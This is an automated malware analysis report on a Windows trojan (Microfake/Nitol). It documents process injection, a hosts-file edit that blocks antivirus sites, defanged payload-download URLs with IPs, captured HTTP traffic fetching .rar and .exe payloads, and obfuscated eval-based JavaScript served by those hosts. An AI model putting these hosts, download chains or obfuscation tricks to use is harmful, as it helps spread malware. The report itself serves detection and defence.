Trojan.Microfake.D_2536732094

by malwarelabrobot on November 18th, 2014 in Malware Descriptions.

Trojan.Win32.MicroFake.ba (Kaspersky), Trojan.Microfake.D (B) (Emsisoft), Trojan.Microfake.D (AdAware), DDoS.Win32.Nitol.FD, mzpefinder_pcap_file.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 2536732094c2c9599eda58d7feb40ffa
SHA1: 6bbd5e533f155313736b6b5532933fa01ffce621
SHA256: dc61adbc3391193e93e2f215a8940f68def389b4da6c40db4ba4029e6b1a6f1c
SSDeep: 768:JojY9PKLeWmM1gJb9MCq5L4UZoayHJojY9P:8miLeW3iV9M7ToayH8m
Size: 45056 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-06-08 12:59:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

taskkill.exe:2984
kmokq.exe:1948
auiay.exe:2924
regsvr32.exe:1680
hrl1.tmp:1736

The Trojan injects its code into the following process(es):

QQExtrenal.exe:3124
svchost.exe:592

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process QQExtrenal.exe:3124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\etc\hosts (898 bytes)

The process kmokq.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\»ÊÕߣ¸£°ÐÇÍõºÏ»÷[1].htm (827 bytes)
%WinDir%\Temp\rhdkm.htm (826 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (4591 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[1].htm (984 bytes)
%WinDir%\Temp\rbrkm.htm (2361 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[2].rar (1338 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (1678 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (803 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\¹âÃ÷ºÏ»÷[1].rar (14456 bytes)
%WinDir%\Temp\rkrkm.htm (11918 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (782 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\²ÆÉñ¢áÐÇ[1].rar (1338 bytes)
%WinDir%\Temp\rqckm.htm (768 bytes)
%WinDir%\Temp\rbbkm.htm (753 bytes)
%WinDir%\Temp\rqrkm.htm (984 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Ò«»Ô´«Ææ[1].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\ÍõÕßÍøÂç[1].htm (0 bytes)
%WinDir%\Temp\rbrkm.htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\ÍõÕßÍøÂç[2].htm (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\²ÆÉñ¢áÐÇ[1].rar (0 bytes)
%WinDir%\Temp\rqckm.htm (0 bytes)
%WinDir%\Temp\rbbkm.htm (0 bytes)

The process auiay.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\jarinet\QQExtrenal.exe (28 bytes)

The process regsvr32.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (37 bytes)

The process hrl1.tmp:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\eeeaea.exe (37 bytes)

Registry activity

The process taskkill.exe:2984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 08 D2 FB 94 FD AB 8F 98 AC 29 24 EC 26 BE 0D"

The process QQExtrenal.exe:3124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D0 14 E4 90 FF 3C 3D 7B 92 F8 24 71 E9 26 09"

The process kmokq.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 2F F6 14 EA 05 78 02 2B 52 48 36 B7 61 EF 55"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process auiay.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE F9 8D B5 8A FE 0B 5E 5C 26 7F 38 09 54 84 34"

The process regsvr32.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 FF F2 9B 4E D6 40 84 48 CC 58 18 B0 C7 B1 92"

The process hrl1.tmp:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 D4 FF E2 C1 93 0F 10 63 F9 10 91 E3 8E AD 6E"

[HKLM\System\CurrentControlSet\Services\Nationalxwn]
"Description" = "Provideskdx a domain server for NI security."

Dropped PE files

MD5 File path
9df9a9eba8026ee00bde7291adf9e9f7 c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\139869[1].exe
9df9a9eba8026ee00bde7291adf9e9f7 c:\WINDOWS\Temp\kmokq.exe
0e95eca14e441eacc29fecce47be107e c:\WINDOWS\system32\eeeaea.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 898 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 www.ijinshan.com
127.0.0.1 www.360.cn
127.0.0.1 www.rising.com.cn
127.0.0.1 www.ijinshan.com
127.0.0.1 kaba365.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2860 3072 3.84485 c9b6b9fbded3d4764666702b145428d1
.rdata 8192 2505 2560 3.36056 6951ee1a0ff3a7f5a44727b4713506a3
.data 12288 672 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 16384 37524 37888 4.14739 e57c1612c8a595a9ef275334498299d5
.reloc 57344 494 512 3.52939 cfa8d04dd000bb30ab126902176ed40d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
405e5da7e3d520ec6da9568f2703d7e5

URLs

URL IP
hxxp://www.yao933.com/271342303367272317273367.rar?rkrkm 115.238.241.109
hxxp://www.zz12320.com/273312325337243270243260320307315365272317273367.rar?rbrkm 60.190.218.179
hxxp://www.86jfw.com/262306311361242341320307.rar?rbrkm 113.17.169.8
hxxp://180.ghyyy.com/322253273324264253306346.rar?rbrkm 124.232.152.41
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rqrkm
hxxp://180.ghyyy.com/322253273324264253306346.rar?rbbkm 124.232.152.41
hxxp://180.ghyyy.com/322253273324264253306346.rar?rqckm 124.232.152.41
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rhdkm
hxxp://180.ghyyy.com/322253273324264253306346.rar?rkckm 124.232.152.41
hxxp://yuvip.s.3322.net/315365325337315370302347.rar?rnekm
hxxp://www.30wz.com/.........rar?rqrkm 183.60.200.175
hxxp://www.30wz.com/.........rar?rhdkm 183.60.200.175
hxxp://180.ghyyy.com/.........rar?rbrkm 124.232.152.41
hxxp://www.yao933.com/.........rar?rkrkm 115.238.241.109
hxxp://180.ghyyy.com/.........rar?rqckm 124.232.152.41
hxxp://www.86jfw.com/.........rar?rbrkm 113.17.169.8
hxxp://180.ghyyy.com/.........rar?rbbkm 124.232.152.41
hxxp://www.zz12320.com/.................rar?rbrkm 60.190.218.179
dk.23145.com 124.232.141.61
www.sj1516.com 61.174.41.74
623968.6600.org 124.232.158.38
www.mojimojimojimoji.com 69.46.84.61
176.jiu75.com 61.174.42.79
1.iqq21.com 61.174.40.214


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive
[email protected].. .....Y....pE.3.. ............exe..j"^y
h$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&.....
...k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c..
...{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1
...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~
.....s........h...f...\..A..G........?.V.....a....c.........O....A/...
.P...5....._......V.........#.W..&. ........n...7...........J....t....
...0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\
T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F..
...q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7
..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..&l
t;...........B8.)..$IH}Iw:[email protected]]a...c....-fT_p"b#6...._&
gt;>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.
52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{[email protected]
.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.d
bJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n...
.op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k
[email protected]/1.1 200 OK..Content-Length: 9337155..Content-Type: applicat
ion/octet-stream..Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT..Accept
-Ranges: bytes..ETag: "7cee72e7991d01:29b"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Date: Mon, 17 Nov 2014 12:11:12 GMT..Connectio
n: [email protected].. .....Y....pE.3.. ..
<<< skipped >>>


GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function bvtjkXR(nJeN){var m;var R;m="";for(var d=0;d<
;nJeN.length;d  ){R=nJeN.charCodeAt(d)^31;m =String.fromCharCode(R^30)
;}return m;}function nsrqnFX(){var bMlC = document.getElementById("iAy
X").value;var hYqC=oqehmWE();window.location=bvtjkXR(hYqC) bMlC;}funct
ion dnnybXT(){var w="107,53,104,52,53";return eval("String.fromCharCod
e(" w ")");}function oqehmWE(){var w="46,62,114,114,103,118,106,100,12
0,60,120,56,107,56,53";return eval("String.fromCharCode(" w ")");}<
/script><html><br><br><br><center><
;h3><font color="#3C3C3C">..............:</font><fon
t color="blue"><script>var zWvP=dnnybXT();document.write(bvtj
kXR(zWvP));</script>  </font><input id="iAyX">   <
;input type=button value="................" onmouseup="nsrqnFX()">&
lt;br><br></h3><center></html>HTTP/1.1 200 
OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/htm
l; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires:
 Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey
=actzmz..<script>function cvlmcUT(){var t="46,62,114,114,103,118
,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" t
 ")");}function sngerDA(xLcU){var u;var M;u="";for(var g=0;g<xLcU.l
ength;g  ){M=xLcU.charCodeAt(g)^19;u =String.fromCharCode(M^18);}retur
n u;}function qmgdjJT(){var t="107,53,104,52,53";return eval("String.f
romCharCode(" t ")");}function ikxwqYV(){var qLxW = document.getEl
<<< skipped >>>


GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:25 GMT
Connection: keep-alive
Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f
.T...exe..T.*..U.......0. .TQP@@D@I..#A%[email protected]"HU H
.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z.
.t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M
............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h.
...&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>
;...........z.F.}[email protected]....?.C...MF.....k...[....:.F.f%...z>..
q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....
O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc....
.;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n.
...t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.5
0.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';
..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u..
..s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3.
..........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l.
.r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......&g
t;../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=.
.b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt.
..T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{
h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.
^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX
.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..
<<< skipped >>>


GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   98
Pragma: no-cache
Cache-control: no-store
<html><body><script>var gp="/........",hp="djfz2",kp
,ip=new Array(),jp;function ep(fp){for(kp=0;kp<jp.length;kp  )ip[kp
]=jp.charCodeAt(kp);kp="kp=4;for(;kp<=53;){ip[kp]=(((((ip[kp]^102)&
lt;<3)&0xff)|((ip[kp]^102)>>5))>>5)|((((((ip[kp]^102)&l
t;<3)&0xff)|((ip[kp]^102)>>5))<<3)&0xff);kp  ;}";eval(k
p);kp="kp=53;do{if(kp<3)break;ip[kp]=(((((ip[kp] 229)&0xff)-109)&0x
ff)>>3)|((((((ip[kp] 229)&0xff)-109)&0xff)<<5)&0xff);kp--;
}while(true);";eval(kp);kp=1;while(kp<=51){ip[kp]=(((((ip[kp] 169)&
0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))>>6)|(((((
(ip[kp] 169)&0xff)>>7)|((((ip[kp] 169)&0xff)<<1)&0xff))<
;<2)&0xff);kp  ;}jp="";for(kp=1;kp<ip.length-1;kp  )if(kp%5)jp =
String.fromCharCode(ip[kp]^fp);kp=eval;kp(jp);}jp="hO\x92\x19:!\x0en\x
01\x1a^\x0e>6zu\x16\x0e\x02E\xc7.j\x1d1/\x01r6r\x04MrvrB\x1e\x06!\x
12\xf1:\x22n\x1e\x0e&VE:Y1\xf7_\xc0 ";ep(176);</script><scrip
t>var u=2;for(;u==1;u  );</script><br><br><br&
gt;<center><h3><p>..............................Java
Script</p></h3></center></body></html>HT
TP/1.0 200 OK..Content-Type: text/html..Content-Length:   984.Pragma: 
no-cache..Cache-control: no-store..<html><body><script&
gt;var gp="/........",hp="djfz2",kp,ip=new Array(),jp;function ep(fp){
for(kp=0;kp<jp.length;kp  )ip[kp]=jp.charCodeAt(kp);kp="kp=4;for(;k
p<=53;){ip[kp]=(((((ip[kp]^102)<<3)&0xff)|((ip[kp]^102)&g
<<< skipped >>>


GET /.........rar?rkrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.yao933.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 3263917
Content-Type: application/octet-stream
Last-Modified: Mon, 10 Nov 2014 12:58:28 GMT
Accept-Ranges: bytes
ETag: "1010c15e6fccf1:304"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:26 GMT
Connection: keep-alive
Rar!.....s...........8t..?.S.1...3...g`...jE.3.. ............exe.QiI.f
.T...exe..T.*..U.......0. .TQP@@D@I..#A%[email protected]"HU H
.TQ..1.O.<....A..^..^.......|.I.2......*.......n...V....U.f../...Z.
.t!(O.'..&......a<&.'.........w.,N(....203s{....-..\....E...7...o.M
............B}..uS.Y$........~..o....P....]'.6.0....../...?...PC..}.h.
...&..H.HS..\..~.?n.Q..G......N.<.h...........\.'.M.....=?L.E.y.>
;...........z.F.}[email protected]....?.C...MF.....k...[....:.F.f%...z>..
q. 6}.O.................e.Y..kh.....;...?.."...s........ .:/..<....
O!....,i<.[.2(*tO. ..q..9Yw..$ej.V)*^.9....omi.o..8....Z.yy|.sc....
.;,. .:c...C~o....Q.R)..z...^.V...x.|vj..3..J."n.I..s).....#..II...)n.
...t..p..Dk=.NH.%1....-.0i.vx....k..[...N.n.(..9;....F'9......8..D.0.5
0.*...lZ....%&....d.. ..}.#2........vW.[......G[ua......T........-MH';
..cl.v*k9.G..Ng.;.E..........Kf...X8XBo. w.C......?/y......nY.U.~8.u..
..s.q.u. .|...=.~s....b...i..........]..S.y..|(...3.^.$.....x.....i.3.
..........E.1.|......l......z......3.{..........79.^})r.W.5....J...-l.
.r){.....Sb`.U.}..y..kY..cj.hbk...\Ojt..i....7.d[..Vg2....|.x.......&g
t;../s....3..a...v....#B6...o.Z..RW.*v}.eki...sC.....x...xT..?......=.
.b.2...r...........Y.c.~....t.3.i..])|#m.6...Z...p.Qz.vH. ..ye....lrt.
..T...1 6.....fbj.W....yUce1B.9=P...cfd...TX....k..[...{-.........f..{
h....1}....*......ORu(.../6.......Rw.....:.j..~....E..O.?'d.N.c...k.u.
^.,.j../H...8.....!.*J...A...%..[x.5G........p..).Ss.t..@:...:..|...tX
.0..o..n.....]...`B5..w... .O"...Wrim..../...CH....o..SP..M.-/B]..
<<< skipped >>>


GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   80
Pragma: no-cache
Cache-control: no-store
<html><body><script>var qy="/........",ry="djfz2",uy
,sy=new Array(),ty;function oy(py){for(uy=0;uy<ty.length;uy  )sy[uy
]=ty.charCodeAt(uy);uy="uy=54;for(;;){if(uy<4)break;sy[uy]=(sy[uy]-
sy[uy-1])&0xff;uy--;}";eval(uy);uy="uy=1;while(true){if(uy>56)break
;sy[uy]=(sy[uy]-sy[uy 1])&0xff;uy  ;}";eval(uy);uy=1;while(true){if(uy
>56)break;sy[uy]=(sy[uy] sy[uy 1])&0xff;uy  ;}ty="";for(uy=1;uy<
sy.length-1;uy  )if(uy%7)ty =String.fromCharCode(sy[uy]^py);uy=eval;uy
(ty);}ty="\xa5a\r\xfe\x8e\x122;\xf8\xbeA\x8c\xab\x85*\xc8\xc7\x00\x92\
x8c\xe8\xa8\x9e$\xa5\xc5\x1b\xd5\xc6\x1a5\n\xacOs\xa6X\xc9\x18\n\xe8m\
x227\x9d|\xa3\x1c\xd6\x17\x9b\xed&\x11\xd9sV=\xfe";oy(20);</script&
gt;<script>var u=2;for(;u==1;u  );</script><br><b
r><br><center><h3><p>......................
........JavaScript</p></h3></center></body><
;/html>..



GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 766
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function crhnuUL(){var s="40,56,116,116,97,112,108,98,12
6,58,126,62,109,62,51";return eval("String.fromCharCode(" s ")");}func
tion hfcnwPH(xXcG){var q;var D;q="";for(var m=0;m<xXcG.length;m  ){
D=xXcG.charCodeAt(m)^60;q =String.fromCharCode(D^59);}return q;}functi
on ajwpbCS(){var s="109,51,110,50,51";return eval("String.fromCharCode
(" s ")");}function ddkipIH(){var yCvO = document.getElementById("nTqP
").value;var xBnV=crhnuUL();window.location=hfcnwPH(xBnV) yCvO;}</s
cript><html><br><br><br><center><h
3><font color="#3C3C3C">..............:</font><font 
color="blue"><script>var uMqM=ajwpbCS();document.write(hfcnwP
H(uMqM));</script>  </font><input id="nTqP">   <i
nput type=button value="................" onmouseup="ddkipIH()"><
;br><br></h3><center></html>HTTP/1.1 200 OK
..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html;
 charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: T
hu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=a
ctzmz..<script>function vvhxnCX(jNjP){var m;var T;m="";for(var v
=0;v<jNjP.length;v  ){T=jNjP.charCodeAt(v)^77;m =String.fromCharCod
e(T^76);}return m;}function aswkdKO(){var r="46,62,114,114,103,118,106
,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" r ")"
);}function mcjwbAN(){var r="107,53,104,52,53";return eval("String.fro
mCharCode(" r ")");}function mhdvkAT(){var uNlD = document.getElem
<<< skipped >>>


GET /.........rar?rhdkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length:   82
Pragma: no-cache
Cache-control: no-store
<html><body><script>var bo="/........",co="djfz2",fo
,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo  )do_[
fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[
fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 
1])&0xff;}while(  fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>
49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo  ;}"
;eval(fo);eo="";for(fo=1;fo<do_.length-1;fo  )if(fo%6)eo =String.fr
omCharCode(do_[fo]^ao);fo=eval;fo(eo);}eo="_\x95\xb7\xbd\xdf\xb4\xdb].
\x1az\x16j\xbf\x1c\xe2\x16\xde\x13\xc3\xc1\xd4\xbd\x8c\x8a\xedC\xee5\x
eb\xa1\xa7\xa2\x9e\xd9\x96\xd7\x9e\x88W{L\x9f[\x97QA\xffx\xcfE\x9a\x8d
4";zo(226);</script><script>var u=2;for(;u==1;u  );</sc
ript><br><br><br><center><h3><p>
;..............................JavaScript</p></h3></cen
ter></body></html>HTTP/1.0 200 OK..Content-Type: text/h
tml..Content-Length:   826.Pragma: no-cache..Cache-control: no-store..
<html><body><script>var bo="/........",co="djfz2",fo
,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo  )do_[
fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[
fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 
1])&0xff;}while(  fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>
